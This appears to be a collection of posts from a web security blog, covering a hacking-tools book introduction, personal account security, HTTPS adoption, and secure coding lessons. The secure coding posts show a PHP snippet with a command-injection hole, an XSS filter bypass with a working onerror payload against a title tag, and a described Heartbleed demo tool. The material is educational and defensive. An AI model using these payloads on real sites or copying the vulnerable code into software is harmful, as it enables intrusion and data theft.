The Fourth Year of the Fourth Edition

Today is the fourth anniversary of the fourth edition of Anti-Hacker Tool Kit. Technology changes quickly, but many of the underlying principles of security remain the same. The following is an excerpt from the introduction.


Welcome to the fourth edition of the Anti-Hacker Tool Kit. This is a book about the tools that hackers use to attack and defend systems. Knowing how to conduct advanced configuration for an operating system is a step toward being a hacker. Knowing how to infiltrate a system is a step along the same path. Knowing how to monitor an attacker’s activity and defend a system are more points on the path to hacking. In other words, hacking is more about knowledge and creativity than it is about having a collection of tools.

Computer technology solves some problems; it creates others. When it solves a problem, technology may seem wonderful. Yet it doesn’t have to be wondrous in the sense that you have no idea how it works. In fact, this book aims to reveal how easy it is to run the kinds of tools that hackers, security professionals, and hobbyists alike use.

A good magic trick amazes an audience. As the audience, we might guess at whether the magician is performing some sleight of hand or relying on a carefully crafted prop. The magician evokes delight through a combination of skill that appears effortless and misdirection that remains overlooked. A trick works not because the audience lacks knowledge of some secret, but because the magician has presented a sort of story, however brief, with a surprise at the end. Even when an audience knows the mechanics of a trick, a skilled magician may still delight them.

The tools in this book aren’t magical, and simply having them on your laptop won’t make you a hacker. But this book will demystify many aspects of information security. You’ll build a collection of tools as you follow along through each chapter. More importantly, you’ll build the knowledge of how and why these tools work. And that’s the knowledge that lays the foundation for being creative with scripting, for combining attacks in clever ways, and for thinking of yourself as a hacker.

I chose magic as a metaphor for hacking because it resonates with creative thinking and combining mundane elements to achieve extraordinary effects. Hacking (in the sense of information security) requires knowing how protocols and programs are put together, and the tools to analyze or attack them. I don’t have a precise definition of a hacker because one isn’t necessary. Consider it a title to be claimed or conferred.

Another reason the definition is nebulous is that information security spans many topics. You might be an expert in one, or a dabbler in all. In this book you’ll find background information and tools for most of those topics. You can skip around to chapters that interest you.

The Anti- prefix of the title originated from the first edition’s bias towards forensics and equating Hacker with Attacker. It didn’t make sense to change the title for a book that’s made its way into a fourth edition (plus I wanted to keep the skull theme cover). Instead, consider the prefix as an antidote to the ego-driven, self-proclaimed hacker who thinks knowing how to run canned exploits out of Metasploit makes them an expert. They just know how to perform a trick. Hacking is better thought of as understanding how a trick is put together, or being able to create new tricks on your own.

Each chapter should set you up with some of that knowledge. And even if you don’t recognize a magical allusion to Hermione, Tenar, or Gaius Helen Mohiam, there should be plenty of technical content to keep you entertained along the way. I hope you enjoy the book.

One Week Lasts All Year

The annual summer conference constellation of the week of Black Hat, BSides, and DEF CON usually brings out a certain vocal concern about personal device security. Some of the concern is grounded in wry humor, using mirth to illustrate a point. Some of it floats on ignorance tainted with misapplied knowledge. That’s fine. Perform the rituals and incantations that make you feel better. Enjoy the conferences, have fun, share some knowledge, learn some skills.

But after you select a level of extra precaution, ask why such a choice is necessary for one week of the year. It’s a question without a single answer. As a leading question, it’s intended to elicit reasons based on a coherent threat model that addresses the week’s anticipated behaviors and environments. As an antagonistic question, it’s intended to explore why “default secure” is insufficient, or why, after more than two decades of one-week-a-year concern, system and device security remains so poor that none of it can be trusted outside your home network.

As you ponder an answer, take a moment to help someone else improve their baseline security profile.

  • For a mobile device, set a passcode longer than four characters.
  • For a mobile device, enable Touch ID or a similar biometric feature.
  • Turn on automatic updates.
  • Enable multi-factor authentication (aka two-factor authentication or two-step verification) for all accounts that support it.
  • Record and save the recovery codes associated with enabling MFA. Help them choose an effective storage method, such as a printed copy kept somewhere safe or an entry in a password-protected keychain.
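
The codes from an authenticator app are typically TOTP values (RFC 6238): a short number derived from a shared secret and the current time. A minimal sketch using only Python's standard library (the secret below is the RFC 4226 test value, not anything you should deploy):

```python
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), "sha1").digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, interval: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP keyed on the current 30-second time step."""
    return hotp(secret, int(time.time()) // interval, digits)

# The RFC 4226 test secret; counter 0 yields the documented value 755224.
print(hotp(b"12345678901234567890", 0))
```

The point of the sketch: the second factor is just math over a shared secret, which is why backing up the secret's recovery codes matters so much.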

As a follow-up to enabling MFA, help them update and make unique each of their passwords.

  • Install a password manager.
  • Starting with their most-used sites, go through the password change process and allow the password manager to assign a new, unique password. If they wish to have a memorable password, ensure that it’s only used for that account.
  • Review any OAuth or Social Logins used for the account, e.g. if they use Facebook, Twitter, LinkedIn, or similar to authenticate to the site or to allow access to their social account.
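
The “new, unique password” a manager assigns is nothing exotic: a long random string drawn from a large alphabet. A rough sketch of that generation step with Python's secrets module (the length and alphabet are arbitrary choices for illustration):

```python
import secrets
import string

def generate_password(length: int = 20) -> str:
    """Pick each character independently from a large alphabet using a CSPRNG."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

# One password per site; reuse is what lets a single breach cascade.
print(generate_password())
```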

Now consider that there are people whose security precautions require attention 52 weeks of the year. People who have expressed an opinion. People who are women. People in abusive relationships. People without political representation, let alone power. These are different situations that need different approaches to securing devices and data.

These are people who can’t buy a “burner phone” for one week, then return to normal. Their normal isn’t the vague threat of a hostile network. It’s the direct threat from hostile actors – those with physical access to their devices, or maybe just knowledge of their passwords, or possibly just knowledge of their existence. But in each case it’s an actor or actors who want access to the victim’s identity, data, and accounts.

After helping someone with the basic security hygiene of setting strong passwords and turning on automatic updates, gather resources for how to deal with different threat models and different levels of concern. Help them translate those concerns into ways of protecting accounts and data.

One resource to start with could be

There’s a trope in infosec that this week has “the most hostile network” ever. A network may indeed be hostile, but a hostile playground network is far different from the threats against a network people use on a daily basis.

It can be fun as well as a great educational experience to attack a playground network. On the other hand, networks that no one can use or be expected to use aren’t reflective of security engineering. If you think a network can never be secured or a device never be safe, then you’ve possibly skipped over the exercise of threat modeling and making choices based on risk.

Builder, Breaker, Blather, Why.


I recently gave a brief talk that noted how Let’s Encrypt and cloud-based architectures encourage positive appsec behaviors. Check out the slides and this blog post for a sense of the main points. Shortly thereafter a slew of security and stability events related to HTTPS and cloud services (SHA-1, Cloudbleed, S3 outage) seemed to undercut this thesis. But perhaps only superficially so. Rather than glibly dismiss these points, let’s examine these events from the perspective of risk and engineering – in other words, how complex systems and software are designed and respond to feedback loops.

This post is a stroll through HTTPS and cloud services, following a path of questions and ideas that builders and breakers might use to evaluate security, leaving the blather of empty pronouncements behind. It’s about the importance of critical thinking and seeking the reasons why a decision comes about.

Eventually Encrypted

For more than a decade at least two major hurdles have blocked pervasive HTTPS: Certs and configuration. The first was (and remains) convincing sites to deploy HTTPS at all, tightly coupled with making deployment HTTPS-only instead of mixed with unencrypted HTTP. The second is getting HTTPS deployments to use strong TLS configurations, e.g. TLS 1.2 with default ciphers that support forward secrecy.
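
On the configuration side, “strong TLS” mostly means refusing old protocol versions and weak ciphers. As one concrete illustration (a sketch of the idea, not a complete server configuration), Python's ssl module lets a context be pinned to TLS 1.2 as a floor:

```python
import ssl

# Start from the library's hardened defaults, then set an explicit version floor.
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2

print(context.minimum_version.name)
```

The same floor-setting exists in every mainstream TLS stack; the hard part has historically been getting deployments to turn it on.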

For apps that handle credit cards, PCI has been a crucial driver for adopting strong HTTPS. Having a requirement to use transport encryption, backed by financial consequences for failure, has been more successful than either asking nicely, raising awareness at security conferences, or shaming. As a consequence, I suspect the rate of HTTPS adoption has been far faster for in-scope PCI sites than others.

The SSL Labs project could also be a factor in HTTPS adoption. It distilled a comprehensive analysis of a site’s TLS configuration into a simple letter grade. The publicly visible results could be used as a shaming tactic, but that’s a weaker strategy for motivating positive change. The failure of shaming, especially as it relates to HTTPS, is partly demonstrated by the too-typical disregard of browser security warnings. (Which is itself a design challenge, not a user failure.)

Importantly, SSL Labs provides an easy way for organizations to consistently monitor and evaluate their sites. This is a step towards providing help for migration to HTTPS-only sites. App owners still bear the burden of fixing errors and misconfigurations, but this tool made it easier to measure and track their progress towards strong TLS.

Effectively Encrypted

Where SSL Labs inspires behavioral change via metrics, the Let’s Encrypt project empowers behavioral change by addressing fundamental challenges faced by app owners.

Let’s Encrypt eases the resource burden of managing HTTPS endpoints. It removes the initial cost of certs (they’re free!) and reduces the ongoing maintenance cost of deploying, rotating, and handling certs by supporting automation with the ACME protocol. Even so, solving the TLS cert problem is orthogonal to solving the TLS configuration problem. A valid Let’s Encrypt cert might still be deployed to an HTTPS service that gets a bad grade from SSL Labs.

A cert signed with SHA-1, for example, will lower its SSL Labs grade. SHA-1 has been known to be weak for years, and its use discouraged, specifically for digital signatures. Having certs that are both free and easy to rotate (i.e. easy to obtain and deploy new ones) makes it easier for sites to migrate off deprecated algorithms. The ability to react quickly to change, whether security-related or not, is a sign of a mature organization. Automation as enabled by Let’s Encrypt is a great way to improve that ability.


The recent work that demonstrated a SHA-1 collision is commendable, but it shouldn’t suddenly be the reason you decide to stop using it. If such proof of danger is your sole deciding factor, you shouldn’t be using (or supporting) Flash or most Android phones.

Facebook explained their trade-offs along the way to hardening their TLS configuration and deprecating SHA-1. It was an engineering-driven security decision that evaluated solutions and chose among conflicting optimizations – all informed by measures of risk. Engineering is the key word in this paragraph; it’s how systems get built. Writing down a simple requirement and prototyping something on a single system with a few dozen users is far removed from delivering a service to hundreds of millions of people. WhatsApp’s crypto design fell into a similar discussion of risk-based engineering. Another example of evaluating risk and threat models is this excellent article on messaging app security and privacy.

Exceptional Events

Companies like Cloudflare take a step beyond SSL Labs and Let’s Encrypt by offering a service to handle both certs and configuration for sites. They pioneered techniques like Keyless SSL in response to their distinctive threat model of handling private keys for multiple entities.

If you look at the Cloudbleed report and immediately think a service like that should be ditched, it’s important to question the reasoning behind such a risk assessment. Rather than make organizations suffer through the burden of building and maintaining HTTPS, they can use a service that establishes a strong default. Adoption of HTTPS is slow enough, and fraught with error, that services like this make sense for many site owners.

Compare this with Heartbleed, which also affected TLS sites, could be more targeted, and exposed private keys (among other sensitive data). The cleanup was long, laborious, and haphazard. Cloudbleed had significant potential exposure, although its discovery and remediation likely led to a lower realized risk than Heartbleed.

If you’re saying move away from services like that, what in practice are you saying to move towards? Self-hosted systems in a rack in an electrical closet? Systems that will likely degrade over time and, even more likely, never be upgraded to TLS 1.3? That seems ill-advised.


Does the recent Amazon S3 outage raise concern for cloud-based systems? Not to a great degree. Or, at least, not in a new way. If your site was negatively impacted by the downtime, a good use of that time might have been exploring ways to architect fail-over systems or revisit failure modes and service degradation decisions. Sometimes it’s fine to explicitly accept certain failure modes. That’s what engineering and business do against constraints of resource and budget.

Coherently Considered

So, let’s leave a few exercises for the reader, a few open-ended questions on threat modeling and engineering.

Flash has long been rebuked as both a performance hog and a security weakness. Like SHA-1, the infosec community has voiced this warning for years. There have even been one or two (maybe more) demonstrated exploits against it. It persists. It’s embedded in Chrome, which you can interpret as a paternalistic effort to sandbox it or (more cynically) an effort to ensure YouTube videos and ad revenue aren’t impacted by an exodus from the plugin – or perhaps somewhere in between.

Browsers have had impactful vulns, many of which carry significant risk and impact as measured by the annual $50K+ rewards from Pwn2Own competitions. The minuscule number of browser vendors carries risk beyond just vulns, affecting influence on standards and protections for privacy. Yet more browsers doesn’t necessarily equate to better security models within browsers.

On the topic of decentralization, how much is good, how much is bad? DNS recommendations go back and forth. We’ve seen huge DDoS against providers, taking out swaths of sites. We’ll see more. But is shifting DNS the right solution, or a matter that misses the underlying threat or cause of such attacks? How much of IoT is new or different (scale?) compared to the swarms of SQL Slammer and Windows XP botnets of yesteryear’s smaller internet population?

Approaching these with ideas around resilience, isolation, authn/authz models, or feedback loops reflects (just a few) traits of a builder, as much as they might be traits of a breaker executing attack models against them.

Approaching these by explaining design flaws and identifying implementation errors reflects (just a few) traits of a breaker, as much as they might be traits of a builder designing controls and barriers to disrupt attacks against them.

Approaching these by dismissing complexity, designing systems no one would (or could) use, or highlighting irrelevant flaws is often just blather. Infosec has its share of vacuous or overly-ambiguous phrases like military-grade encryption, perfectly secure, artificial intelligence (yeah, I know, blah blah blah Skynet), use-Tor-use-Signal. There’s a place for mockery and snark. This isn’t concern trolling, which is preoccupied with how things are said. This is about the understanding behind what is said – the risk calculation, the threat model, the constraints.

Constructive Closing


I believe in supporting people to self-identify along the spectrum of builder and breaker rather than pin them to narrow roles. (A principle applicable to many more important subjects as well.) This is about the intellectual reward of tackling challenges faced by builders and breakers alike, and leaving behind the blather of uninformed opinions and empty solutions.

I’ll close with this observation from Carl Sagan (from his book, The Demon-Haunted World): “It is far better to grasp the universe as it really is than to persist in delusion, however satisfying and reassuring.”

Our application universe consists of systems and data and users, each in different orbits. Security should contribute to the gravity that binds them together, not the black hole that tears them apart. Engineering sees the universe as it really is; shed the delusion that one appsec solution in a vacuum is always universal.

I'll ne'er look you i' the plaintext again

Look at this playbill: air fresheners, web security, cats. Thanks to Let’s Encrypt, this site is now accessible via HTTPS by default. Even better, WordPress serves the Strict-Transport-Security header to ensure browsers adhere to HTTPS when visiting it. So, whether you’re being entertained by odors, HTML injection, or felines, your browser is encrypting traffic.
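
The Strict-Transport-Security header is a simple directive list. A small sketch of what a browser extracts from it (the max-age value here is a common choice, not necessarily this site's exact policy):

```python
def parse_hsts(header: str) -> dict:
    """Split an HSTS header into its directives, e.g. max-age and includeSubDomains."""
    directives = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        directives[name.lower()] = value or True
    return directives

policy = parse_hsts("max-age=31536000; includeSubDomains")
print(policy["max-age"])  # seconds the browser will insist on HTTPS
```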

deadliestwebattacks TLS

Let’s Encrypt makes this possible for two reasons. The project provides free certificates, which addresses the economic aspect of obtaining and managing them. Users who blog, create content, or set up their own web sites can do so with free tools. But HTTPS certificates were never free, and there was little incentive for such users to spend money on them. To further compound the issue, users creating content and web sites rarely needed to know the technical underpinnings of how those sites were set up (which is perfectly fine!). Yet the secure handling and deployment of certificates requires more technical knowledge.

Most importantly, Let’s Encrypt addressed this latter challenge by establishing a simple, secure ACME protocol for the acquisition, maintenance, and renewal of certificates. Even when (or perhaps especially when) certificates have lifetimes of one or two years, site administrators would forget to renew them. It’s this level of automation that makes the project successful.
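
The renewal bookkeeping that admins forget is exactly what an ACME client automates: check the cert's notAfter date, renew once it falls within some window. A sketch of that check (the 30-day window mirrors common client defaults, an assumption rather than a fixed rule):

```python
from datetime import datetime, timedelta, timezone

def needs_renewal(not_after: datetime, window_days: int = 30) -> bool:
    """True when the cert expires within the renewal window."""
    return not_after - datetime.now(timezone.utc) <= timedelta(days=window_days)

# A cert expiring in 10 days is inside the default 30-day window.
soon = datetime.now(timezone.utc) + timedelta(days=10)
print(needs_renewal(soon))
```

Run on a schedule, a check like this is the difference between certs that quietly expire and certs that quietly rotate.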

Hence, WordPress can now afford – both in the economic and technical sense – to deploy certificates for all the custom domain names it hosts. That’s what brings us to the cert for this site, which is but one domain in a list of SAN entries from deadairfresheners to a Russian-language blog about, inevitably, cats.

Yet not everyone has taken advantage of the new ease of encrypting everything. Five years ago I wrote about Why You Should Always Use HTTPS. Sadly, the article itself is served only via HTTP. You can request it via HTTPS, but the server returns a hostname mismatch error for the certificate, which breaks the intent of using a certificate to establish a server’s identity.


As with anything new, free, and automated, there will be abuse. For one, malware authors, phishers, and the like will continue to move towards HTTPS connections. The key point there being “continue to”. Such bad actors already have access to certs and to compromised financial accounts with which to buy them. There’s little in Let’s Encrypt that exacerbates this.

Attackers may start looking for Let’s Encrypt clients in order to obtain certs by fraudulently requesting new ones. For example, by provisioning a resource under a well-known URI for the domain (this, and provisioning DNS records, are two ways of establishing trust to the Let’s Encrypt CA).

Attackers may also accelerate domain enumeration via Let’s Encrypt SANs. Again, it’s trivial to walk through the domains in any SAN certificate issued today. This may only be a nuisance for hosting sites or aggregators who are jumbling multiple domains into a single cert.
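
The enumeration is trivial because every SAN entry sits in plaintext in the cert. Given the dict shape that Python's ssl.getpeercert() returns, pulling the domain list is one comprehension (the hostnames below are made-up placeholders):

```python
def san_domains(peercert: dict) -> list:
    """Extract DNS names from the subjectAltName field of a parsed certificate."""
    return [value for kind, value in peercert.get("subjectAltName", ()) if kind == "DNS"]

# Shape matches ssl.getpeercert(); the entries are hypothetical.
cert = {"subjectAltName": (("DNS", "example.com"), ("DNS", "blog.example.net"))}
print(san_domains(cert))
```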

Such attacks aren’t proposed as creaky boards on the Let’s Encrypt stage. They’re merely reminders that we should always be reconsidering how old threats and techniques apply to new technologies and processes. For many “astounding” hacks of today (namely the proliferation of Named-Ones-Who-I-Shall-Not-Name), there are likely close parallels to old Phrack articles or basic security principles awaiting clever reinterpretation for our modern times.

Julius Caesar

Finally, I must leave you with some sort of pop culture reference, or else this post wouldn’t befit the site. This is the 400th anniversary of Shakespeare’s death. So I shall leave you with yet another quote. May it take us far less time to finally bury HTTP and praise the ubiquity of HTTPS.

Nay, an I tell you that, I’ll ne’er look you i’ the face again: but those that understood him smiled at one another and shook their heads; but, for mine own part, it was Greek to me. I could tell you more news too: Marullus and Flavius, for pulling scarfs off Caesar’s images, are put to silence. Fare you well. There was more foolery yet, if I could remember it.

Julius Caesar. I.ii.278-284

You've Violated APE Law!

Developers who wish to defend their code should be aware of Advanced Persistent Exploitability. It is a situation where breaking code remains possible due to broken code.

La Planète des Singes

Code has errors. Writing has errors. Consider the pervasiveness of spellcheckers and how often the red squiggle complains about a misspelling in as common an activity as composing email. Mistakes happen; they’re a natural consequence of writing, whether code, blog, email, or book. The danger here is that in code these mistakes lead to exploits.

Sometimes coding errors arise from a stubborn refusal to acknowledge fundamental principles, as seen in the Advanced Persistent Ignorance that lets SQL injection persist almost a decade after programming languages first provided countermeasures. That vuln is so old that anyone with sqlmap and a URL can trivially exploit it.

Other coding errors are due to the lack of follow-through to address the fundamental causes of a vuln; the defender fixes the observed exploit as opposed to understanding and fixing the underlying issue. This approach fails when the attacker merely needs to tweak an exploit in order to compromise the vuln again.

We’ll use the following PHP snippet as an example. It has an obvious flaw in the arg parameter:

$arg = $_GET['arg'];
$r = exec('/bin/ls ' . $arg);

Confronted with an exploit that contains a semicolon to execute an arbitrary command, a developer might remember to apply input validation. This is not necessarily wrong, but it is a first step on the dangerous path of the “Clever Factor”. In this case, the developer chose to narrow the parameter to contain only letters.

$arg = $_GET['arg'];
# did one better than escapeshellarg
if (preg_match('/[a-zA-Z]+/', $arg)) {
    $r = exec('/bin/ls ' . $arg);
}

As a first offense, the regex should have been anchored to match the complete input string, i.e. '/^[a-zA-Z]+$/'. That mistake alone should be enough to dismiss this dev’s understanding of the problem and claim to a clever solution. But let’s continue the exercise with three more questions:

Is the intention clear? Is it resilient? Is it maintainable?

This developer declared they “did one better” than the documented solution by restricting input to mixed-case letters. One possible interpretation is that they only expected directories with mixed-case alpha names. A subsequent dev may point out the need to review directories that include numbers or a dot (.) and, as a consequence, relax the regex. That change may still be in the spirit of the validation approach (after all, it’s restricting input to expectations), but if the regex changes to where it allows a space or shell metacharacters, then it’ll be exploited. Again.
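
That failure mode is easy to demonstrate. Python's re module mirrors PHP's preg_match here: an unanchored pattern is satisfied by any matching substring, so hostile input sails through, while anchoring to the full string rejects it:

```python
import re

payload = "docs; cat /etc/passwd"

# Unanchored: matches the leading letters and waves the whole payload through.
print(bool(re.search(r"[a-zA-Z]+", payload)))     # True

# Anchored to the complete string: the metacharacters cause the match to fail.
print(bool(re.fullmatch(r"[a-zA-Z]+", payload)))  # False
```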

This leads to resilience against code churn. The initial code might be clear to someone who understands the regex to be an input filter (albeit an incorrect one in the first version). But the regex’s security requirements are ambiguous enough that someone else may mistakenly change it to allow metacharacters or introduce a typo that weakens it. Additionally, what kind of unit tests accompanied the original version? Merely some strings of known directories and a few negative tests with “./” and “..”? None of those tests would have demonstrated the vulnerability or conveyed the intended security aspect of the regex.

Code must be maintained over time. In the PHP example, the point of validation is right next to the point of usage. Think of this as the spatial version of the time of check to time of use flaw. In more complex code, especially long-lived code and projects with multiple committers, the validation check could easily drift further and further from the location where its argument is used. This dilutes the original developer’s intention since someone else may not realize the validation context and re-taint (such as with string concatenation with other input parameters) or otherwise misuse the parameter.

In this scenario, the solution isn’t even difficult. PHP’s documentation gives clear, prominent warnings about how to secure calls to the entire family of exec-style commands.

$r = exec('/bin/ls ' . escapeshellarg($arg));

The recommended solution has a clear intent – escape shell arguments passed to a command. It’s resilient – the PHP function will handle all shell metacharacters, not to mention the character encoding (like UTF-8). And it’s easy to maintain – whatever manipulation the $arg parameter suffers throughout the code, it will be properly secured at its point of usage.
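
The same point-of-usage escaping exists outside PHP. Python's shlex.quote plays the role of escapeshellarg: whatever the argument contains, it reaches the shell as a single inert token:

```python
import shlex

arg = "docs; cat /etc/passwd"

# The whole string becomes one quoted argument; the semicolon loses its meaning.
command = "/bin/ls " + shlex.quote(arg)
print(command)
```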

It also requires less typing than the back-and-forth of multiple bug comments needed to explain the pitfalls of regexes and the necessity of robust defenses. Applying a fix to stop an exploit is not the same as applying a fix to solve a vulnerability’s underlying problem.

There is a wealth of examples of this phenomenon, from string-matching on alert to block cross-site scripting attacks, to renaming files to prevent repeat exploitation (oh, the obscurity!), to stopping a service only to have it restart when the system reboots.

What does the future hold for programmers? Pierre Boulle’s vacationing astronauts perhaps summarized it best in the closing chapter of La Planète des Singes:

Des hommes raisonnables ? … Non, ce n’est pas possible (“Reasonable men? … No, it’s not possible”)

May your interplanetary voyages lead to less strange worlds.

Bad Code Entitles Good Exploits

I have yet to create a full taxonomy of the mistakes developers make that lead to insecure code. As a brief note towards that effort, here’s an HTML injection (aka cross-site scripting) example that’s due to a series of tragic assumptions that conspire to not only leave the site vulnerable, but waste lines of code doing so.

The first clue lies in the querystring’s state parameter. The site renders the state’s value into a title element. Naturally, a first probe for HTML injection would attempt to terminate that tag. If successful, then it’s trivial to append arbitrary markup such as <script> tags. A simple probe injects a closing </title> tag followed by a payload.

The site responds by stripping the payload’s </title> tag (plus any subsequent characters). Only the text leading up to the injected tag is rendered within the title.


This seems to have effectively countered the attack without exposing any vuln. Of course, if you’ve been reading this blog for any length of time, you’ll know this trope of deceitful appearances always leads to a vuln. That which seems secure shatters under scrutiny.

The developers knew that an attacker might try to inject a closing </title> tag. Consequently, they created a filter to watch for such things and strip them. This could be implemented as a basic case-insensitive string comparison or a trivial regex.

And it could be bypassed by just a few characters.

Consider the following closing tags. Regardless of whether they seem surprising or silly, the extraneous characters are meaningless to HTML yet meaningful to our exploit because they foil the assumption that regexes make good parsers.

<%00/title> <""/title> </title""> </title id="">

After inspecting how the site responds to each of the tags, it’s apparent that the site’s filter only expected a so-called “good” </title> tag. Browsers don’t care about an attribute on the closing tag. (They’ll ignore such characters as long as they don’t violate parsing rules.)
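
The bypass can be reproduced in a couple of lines. A filter that matches only the “good” closing tag, as the site apparently did, never sees the variants (the filter below is a hypothetical reconstruction, not the site's actual code):

```python
import re

def naive_filter(value: str) -> str:
    """Strip a well-formed closing title tag, as the vulnerable site seemed to."""
    return re.sub(r"(?i)</title>", "", value)

blocked = naive_filter("abc</title><img src=x onerror=alert(9)>")
bypassed = naive_filter('abc</title id="a"><img src=x onerror=alert(9)>')

print("</title" in blocked)   # False: the plain tag was stripped
print("</title" in bypassed)  # True: the attribute variant sailed through
```

A browser's forgiving parser treats both inputs as a closed title element; only the regex sees a difference, which is the whole vuln.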

Next, we combine the filter bypass with a payload. In this case, we’ll use an image onerror event.

The attack works! We should have been less sloppy and added an opening <TITLE> tag to match the newly orphaned closing one. A good exploit should not leave the page messier than it was before.

<TITLE>abc</title id="a"><img src=x onerror=alert(9)> Vulnerable & Exploited Information Resource Center</TITLE>

The tragedy of this vuln is that it proves the site’s developers were aware of the concept of HTML injection exploits, but failed to grasp the fundamental characteristics of the vuln. The effort spent blocking an attack (i.e. countering an injected closing tag) not only wasted lines of code on an incorrect fix, but left the naive developers with a false sense of security. The code became more complex and less secure.

The mistake also highlights the danger of assuming that well-formed markup is the only kind of markup. Browsers are capricious beasts; they must dance around typos, stomp upon (or skirt around) errors, and walk bravely amongst bizarrely nested tags. This syntactic havoc is why regexes are notoriously worse at dealing with HTML than proper parsers.

There’s an ancillary lesson here in terms of automated testing (or quality manual pen testing, for that matter). A scan of the site might easily miss the vuln if it uses a payload that the filter blocks, or doesn’t apply any attack variants. This is one way sites “become” vulnerable when code doesn’t change, but attacks do.

And it’s one way developers must change their attitudes from trying to outsmart attackers to focusing on basic security principles.

A Monstrous Confluence

You taught me language, and my profit on’t
Is, I know how to curse: the red plague rid you,
For learning me your language!

Caliban (The Tempest, I.ii.363-365)

The announcement of the Heartbleed vulnerability revealed a flaw in OpenSSL that could be exploited by a simple mechanism against a large population of targets to extract random memory from the victim. At worst, that pilfered memory would contain sensitive information like HTTP requests (with cookies, credentials, etc.) or even parts of the server’s private key. (Or malicious servers could extract similarly sensitive data from vulnerable clients.)

In the spirit of Shakespeare’s freckled whelp, I combined a desire to learn about Heartbleed’s underpinnings with my ongoing experimentation with the new language features of C++11. The result is a demo tool named Hemorrhage.

Hemorrhage shows two different approaches to sending modified TLS heartbeats. One relies on the Boost.ASIO library to set up a TCP connection, then handles the SSL/TLS layer manually. The other uses a more complete adoption of Boost.ASIO and its asynchronous capabilities. It was this async aspect where C++11 really shone. Lambdas made setting up callbacks a pleasure — especially in terms of readability compared to prior techniques that required binds and placeholders.

Readable code is hackable (in the creation sense) code. Being able to declare variables with auto made the code easier to read, especially when dealing with iterators. Although Hemorrhage only takes minimal advantage of move semantics and unique_ptr, they are currently my favorite C++11 features after lambdas and auto.

Hemorrhage itself is simple. Check out the for more details about compiling it. (Hint: As long as you have Boost and OpenSSL it’s easy on Unix-based systems.)

The core of the tool is taking the tls1_heartbeat() function from OpenSSL’s ssl/t1_lib.c file and changing the payload length — essentially a one-line modification. Yet another approach might be to use the original tls1_heartbeat() function and modify the heartbeat data directly by manipulating the SSL* pointer’s s3->wrec data via the SSL_CTX_set_msg_callback().

In any case, the tool’s purpose was to “learn by implementing something” as opposed to crafting more insidious exploits against Heartbleed. That’s why I didn’t bother with more handshake protocols or STARTTLS. It did give me a better understanding of OpenSSL’s internals (and I’ll add my voice to the chorus bemoaning their readability).

Audit Accounts, Partition Passwords, Stay Secure

It’s a new year, so it’s time to start counting days until we hear about the first database breach of 2014 to reveal a few million passwords. Before that inevitable compromise happens, take the time to clean up your web accounts and passwords. Don’t be a prisoner to bad habits.

There’s no reason to reuse a password across any account. Partition your password choices so that each account on each web site uses a distinct value. This prevents an attacker who compromises one password (hashed or otherwise) from jumping to another account that uses the same credentials.


At the very least, your email, Facebook, and Twitter accounts should have different passwords. Protecting email is especially important because so many sites rely on it for password resets.

And if you’re still using the password kar120c I salute your sci-fi dedication, but pity your password creation skills.

Next, consider improving account security through the following steps.

Consider Using OAuth — Passwords vs. Privacy

Many sites now support OAuth for managing authentication. Essentially, OAuth is a protocol in which a site asks a provider (like Facebook or Twitter) to verify a user’s identity without having to reveal that user’s password to the inquiring site. This way, the site can create user accounts without having to store passwords. Instead, the site ties your identity to a token that the provider verifies. You prove your identity to Facebook (with a password) and Facebook proves to the site that you are who you claim to be.

If a site allows you to migrate an existing account from a password-based authentication scheme to an OAuth-based one, make the switch. Otherwise, keep this option in mind whenever you create an account in the future.

But there’s a catch. A few, actually. OAuth shifts a site’s security burden from password management to token management and correct protocol implementation. It also introduces privacy considerations related to centralizing authentication with a provider, as well as how much data providers share.

Be wary about how sites mix authentication and authorization. Too many sites ask for access to your data in exchange for using something like Facebook Connect. Under OAuth, the site can assume your identity to the degree you’ve authorized, from reading your list of friends to posting status updates on your behalf.

Grant the minimum permissions whenever a site requests access (i.e. authorization) to your data. Weigh this decision against your desired level of privacy and security. For example, a site or mobile app might insist on access to your full contacts list or the ability to send Tweets. If this is too much for you, then forego OAuth and set up a password-based account.

(The complexity of OAuth has many implications for users and site developers. We’ll return to this topic in future articles.)

Two-Factor Auth — One Equation in Two Unknowns

Many sites now support two-factor auth for supplementing your password with a temporary passcode. Use it. This means that access to your account is contingent on both knowing a shared secret (the password you’ve given the site) and being able to generate a temporary code.

Your password should be known only to you because that’s how you prove your identity. Anyone who knows that password — whether it’s been shared or stolen — can use it to assume your identity within that account.

A second factor is intended to be a stronger proof of your identity by tying it to something more unique to you, such as a smartphone. For example, a site may send a temporary passcode via text message or rely on a dedicated app to generate one. (Such an app must already have been synchronized with the site; it’s another example of a shared secret.) In either case, you’re proving that you have access to the smartphone tied to the account. Ideally, no one else is able to receive those text messages or generate the same sequence of passcodes.

The limited lifespan of a passcode is intended to reduce the window of opportunity for brute force attacks. Imagine an attacker knows the account’s static password. There’s nothing to prevent them from guessing a six-digit passcode. However, they only have a few minutes to guess one correct value out of a million. When the passcode changes, the attacker has to throw away all previous guesses and start the brute force anew.
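The arithmetic behind that window is worth a glance. Assuming a six-digit code and no rate limiting (both assumptions for illustration), the attacker’s odds after a run of guesses are:

```javascript
// Probability of hitting one correct 6-digit passcode in `tries`
// independent guesses against a space of one million values.
function guessProbability(tries, space = 1e6) {
  return 1 - Math.pow(1 - 1 / space, tries);
}

// Even a fast 1,000 guesses inside the window leaves roughly 0.1% odds;
// when the code rotates, the accumulated work resets to zero.
console.log(guessProbability(1000));
```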

The two-factor auth concept is typically summarized as the combination of “something you know” with “something you possess”. It really boils down to combining “something easy to share” with “something hard to share”.

Beware Password Recovery — It’s Like Shouting Secret in a Crowded Theater

If you’ve forgotten your password, use the site’s password reset mechanism. And cross your fingers that the account recovery process is secure. If an attacker can successfully exploit this mechanism, then it doesn’t matter how well-chosen your password was (or possibly even if you’re relying on two-factor auth).

If the site emails you your original password, then the site is insecure and its developers are incompetent. It implies the password has not even been hashed.

